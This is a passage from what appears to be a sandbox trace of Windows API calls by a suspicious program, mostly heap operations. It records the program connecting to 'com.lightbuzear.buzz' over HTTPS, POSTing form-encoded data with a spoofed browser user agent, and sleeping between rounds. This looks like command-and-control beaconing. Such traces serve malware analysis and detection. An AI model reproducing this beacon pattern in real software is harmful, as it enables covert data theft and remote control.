lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x5) returned 1 [0227.556] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48300e8 | out: hHeap=0x4780000) returned 1 [0227.556] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0227.556] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce730 [0227.556] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce740 [0227.557] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0227.557] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6c0 [0227.557] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0227.557] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5a0 [0227.557] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0227.557] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6f0 [0227.557] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0227.557] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815608 [0227.557] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6f0 | out: hHeap=0x4780000) returned 1 [0227.557] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x48155c0 [0227.557] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815608 | out: hHeap=0x4780000) returned 1 [0227.557] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0227.557] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48155c0 | out: hHeap=0x4780000) returned 1 [0227.557] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4830408 [0227.557] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0227.558] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbf28 [0227.558] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830408 | out: hHeap=0x4780000) returned 1 [0227.558] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830390 [0227.558] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbc50 [0227.558] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48300e8 [0227.558] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0227.558] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbf28 | out: hHeap=0x4780000) returned 1 [0227.559] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0227.559] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x0) returned 1 [0227.559] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48300e8 | out: hHeap=0x4780000) returned 1 [0227.559] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0227.559] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0227.559] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0227.559] FreeLibrary (hLibModule=0x71570000) returned 1 [0227.559] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0227.559] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0227.560] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830048 | out: hHeap=0x4780000) returned 1 [0227.560] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48300c0 | out: hHeap=0x4780000) returned 1 [0227.560] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830ef8 | out: hHeap=0x4780000) returned 1 [0227.560] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830cf0 | out: hHeap=0x4780000) returned 1 [0227.560] Sleep (dwMilliseconds=0x2710) [0227.576] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6c0 [0227.576] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce620 [0227.576] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0227.576] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce600 [0227.576] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0227.576] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6d0 [0227.576] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0227.576] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce710 [0227.577] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0227.577] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x48155d8 [0227.577] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0227.577] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815530 [0227.577] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48155d8 | out: hHeap=0x4780000) returned 1 [0227.577] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0227.577] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815530 | out: hHeap=0x4780000) returned 1 [0227.577] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x4815518 [0227.577] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830cf0 [0227.577] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830cf0 | out: hHeap=0x4780000) returned 1 [0227.577] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0227.577] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830cf0 [0227.577] LoadLibraryW (lpLibFileName="Urlmon.dll") returned 0x71780000 [0227.578] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce710 [0227.578] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce570 [0227.578] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0227.578] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5a0 [0227.578] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0227.578] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce740 [0227.578] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0227.578] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5e0 [0227.578] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0227.578] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815608 [0227.578] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0227.578] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815650 [0227.578] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815608 | out: hHeap=0x4780000) returned 1 [0227.578] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0227.578] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815650 | out: hHeap=0x4780000) returned 1 [0227.578] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4830ef8 [0227.578] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0227.578] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0227.579] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830ef8 | out: hHeap=0x4780000) returned 1 [0227.579] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830ef8 [0227.579] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbf28 [0227.579] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48301d8 [0227.579] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbf28 | out: hHeap=0x4780000) returned 1 [0227.580] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0227.580] GetProcAddress (hModule=0x71780000, lpProcName="ObtainUserAgentString") returned 0x71852f30 [0227.580] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0xdf2f4, cbSize=0xde1cc | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0xde1cc) returned 0x0 [0227.580] FreeLibrary (hLibModule=0x71780000) returned 1 [0227.581] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48301d8 | out: hHeap=0x4780000) returned 1 [0227.581] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0227.581] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830278 [0227.581] InternetConnectA (hInternet=0xcc0004, lpszServerName="com.lightbuzear.buzz", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0227.581] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce690 [0227.581] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce670 [0227.581] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0227.581] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce610 [0227.581] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0227.581] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6a0 [0227.581] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0227.581] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5c0 [0227.582] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0227.582] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x48155a8 [0227.582] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5c0 | out: hHeap=0x4780000) returned 1 [0227.582] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x48156e0 [0227.582] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48155a8 | out: hHeap=0x4780000) returned 1 [0227.582] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0227.582] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48156e0 | out: hHeap=0x4780000) returned 1 [0227.582] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x48155a8 [0227.582] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830480 [0227.582] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830480 | out: hHeap=0x4780000) returned 1 [0227.582] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0227.582] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48300c0 [0227.582] LoadLibraryW (lpLibFileName="Wininet.dll") returned 0x71570000 [0227.583] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830318 [0227.583] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5a0 [0227.583] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce610 [0227.583] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0227.583] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5a0 [0227.583] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0227.583] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5e0 [0227.583] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0227.583] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5a0 [0227.583] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0227.583] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x48157e8 [0227.583] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0227.583] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815578 [0227.584] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48157e8 | out: hHeap=0x4780000) returned 1 [0227.584] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0227.584] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815578 | out: hHeap=0x4780000) returned 1 [0227.584] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x4815578 [0227.584] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830048 [0227.584] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830048 | out: hHeap=0x4780000) returned 1 [0227.584] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0227.584] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="Kolpt523ytcserstrew/torel", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x800000, dwContext=0x0) returned 0xcc000c [0227.585] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce730 [0227.585] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce640 [0227.585] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0227.585] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce750 [0227.585] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0227.585] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce570 [0227.585] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0227.585] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce630 [0227.585] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0227.585] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815620 [0227.585] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0227.585] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815590 [0227.585] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815620 | out: hHeap=0x4780000) returned 1 [0227.585] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0227.585] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815590 | out: hHeap=0x4780000) returned 1 [0227.585] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4830480 [0227.585] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0227.585] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbcf8 [0227.586] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830480 | out: hHeap=0x4780000) returned 1 [0227.586] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830340 [0227.586] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbd30 [0227.586] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830458 [0227.586] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbd30 | out: hHeap=0x4780000) returned 1 [0227.586] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0227.587] GetProcAddress (hModule=0x71570000, lpProcName="InternetSetOptionA") returned 0x71611dc0 [0227.587] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0xde1c8*, dwBufferLength=0x4) returned 1 [0227.587] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830458 | out: hHeap=0x4780000) returned 1 [0227.587] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce740 [0227.587] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce730 [0227.587] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0227.587] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce740 [0227.587] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0227.587] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce620 [0227.587] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0227.587] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce670 [0227.587] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0227.587] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x48156e0 [0227.588] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0227.588] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815500 [0227.588] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48156e0 | out: hHeap=0x4780000) returned 1 [0227.588] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0227.588] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815500 | out: hHeap=0x4780000) returned 1 [0227.588] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4830250 [0227.588] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0227.588] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbe48 [0227.588] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830250 | out: hHeap=0x4780000) returned 1 [0227.588] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830408 [0227.588] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbc50 [0227.588] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48301d8 [0227.588] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0227.589] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe48 | out: hHeap=0x4780000) returned 1 [0227.590] GetProcAddress (hModule=0x71570000, lpProcName="HttpSendRequestA") returned 0x71638e60 [0227.604] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type:application/x-www-form-urlencoded", dwHeadersLength=0x2e, lpOptional=0x47a6f78*, dwOptionalLength=0x4b2) returned 1 [0228.746] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48301d8 | out: hHeap=0x4780000) returned 1 [0228.746] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5e0 [0228.746] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce640 [0228.747] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0228.747] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce750 [0228.747] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce600 [0228.747] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0228.747] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce710 [0228.747] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0228.747] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce630 [0228.747] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0228.747] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce600 [0228.747] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0228.747] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815530 [0228.747] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0228.747] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x48157d0 [0228.747] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815530 | out: hHeap=0x4780000) returned 1 [0228.747] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0228.747] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48157d0 | out: hHeap=0x4780000) returned 1 [0228.747] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4830138 [0228.747] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0228.747] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0228.747] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830138 | out: hHeap=0x4780000) returned 1 [0228.747] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48301d8 [0228.747] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbd30 [0228.747] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830110 [0228.748] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbd30 | out: hHeap=0x4780000) returned 1 [0228.749] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0228.749] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0228.749] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x5) returned 1 [0228.749] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830110 | out: hHeap=0x4780000) returned 1 [0228.750] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0228.750] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6a0 [0228.750] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce570 [0228.750] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0228.750] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce620 [0228.750] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0228.750] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce740 [0228.750] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0228.750] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce610 [0228.750] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0228.750] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815590 [0228.750] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0228.750] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x48155c0 [0228.750] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815590 | out: hHeap=0x4780000) returned 1 [0228.750] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0228.750] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48155c0 | out: hHeap=0x4780000) returned 1 [0228.750] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4830250 [0228.750] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0228.750] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0228.750] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830250 | out: hHeap=0x4780000) returned 1 [0228.750] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48302a0 [0228.750] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbcf8 [0228.750] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830368 [0228.751] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0228.752] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, 